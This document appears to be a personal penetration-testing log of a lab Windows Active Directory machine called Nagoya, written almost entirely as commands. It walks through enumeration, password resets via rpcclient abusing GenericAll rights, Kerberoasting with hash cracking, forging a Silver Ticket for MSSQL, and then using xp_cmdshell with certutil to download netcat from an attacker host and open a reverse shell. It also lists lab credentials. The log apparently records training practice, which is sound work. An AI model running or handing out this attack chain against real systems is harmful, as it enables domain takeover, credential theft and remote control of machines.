🧪 Pentest Log: {{date:2025-08-04}}

🔍 Target Information

• Machine Name: Nagoya
• IP Address: 192.168.123.21
• Operating System: Windows

ip=192.168.123.21

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) 

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 53

dig any nagoya-industries.com @$ip

dig AXFR @$ip 

Port 80

Web Directory Scan

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

feroxbuster --url http://$ip

wpscan -url http://$ip

dirsearch -u http://$ip -r -o dirsearch.txt

Port 135, 593

rpcclient -U '' -N $ip

Port 139, 445

smbclient -L \\\\$ip\\

enum4linux -a $ip

Port 389, 636, 3268, 3269

ldapsearch -H ldap://$ip -x -s base namingcontexts

ldapsearch -H ldap://$ip -x -b"DC=hutch,DC=offsec" > ldap_dump.txt

bloodhound-python -u "andrea.hayes" -p 'Nagoya2023' -d nagoya-industries.com -c all --zip -ns $ip

found andrea.hayes has GenericALL privilege on svc_desk

Port 3389

Port 5985

💣 Exploitation / Foothold

Tool / Script Used:

rpcclient -U 'andrea.hayes%Nagoya2023' $ip

setuserinfo svc_helpdesk 23 'Password123!'

rpcclient -U 'svc_helpdesk%Password123!' $ip

setuserinfo christopher.lewis 23 'Password123!'

Kerberoasting with svc_helpdesk:Password123!, found svc_mssql

impacket-GetUserSPNs  -dc-ip $ip nagoya-industries.com/svc_helpdesk:'Password123!' -request -outputfile hashes.asreproast

crack the hash with john

john hashes.asreproast --wordlist='/home/kali/Documents/oscp/rockyou.txt'

obtain

svc_mssql:Service1

🧬 Privilege Escalation

👤 Current Access

• User: christopher.lewis
• Groups: N/A
• Shell Type: evil winrm

🔍 Enumeration

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: Silver Ticket
• Target Binary/Service: MSSQL
• Reference / Source: N/A

🔧 Exploit Steps

• Setup

echo -n 'Service1' | iconv -t utf16le | openssl dgst -md4

impacket-ticketer -nthash e3a0168bc21cfb88b95c954a5b18f57c -domain-sid S-1-5-21-1969309164-1513403977-1686805993 -domain NAGOYA-INDUSTRIES.COM -spn MSSQL/nagoya.nagoya-industries.com -groups 512,513,52 administrator


export KRB5CCNAME=$(pwd)/administrator.ccache

impacket-mssqlclient -k -no-pass nagoya.nagoya-industries.com -windows-auth

• Smash to Administrator

xp_cmdshell "certutil -urlcache -split -f http://192.168.45.163/nc64.exe C:\Users\Public\nc64.exe"

xp_cmdshell "C:\Users\Public\nc64.exe 192.168.45.163 80 -e cmd"

nc -lvnp 80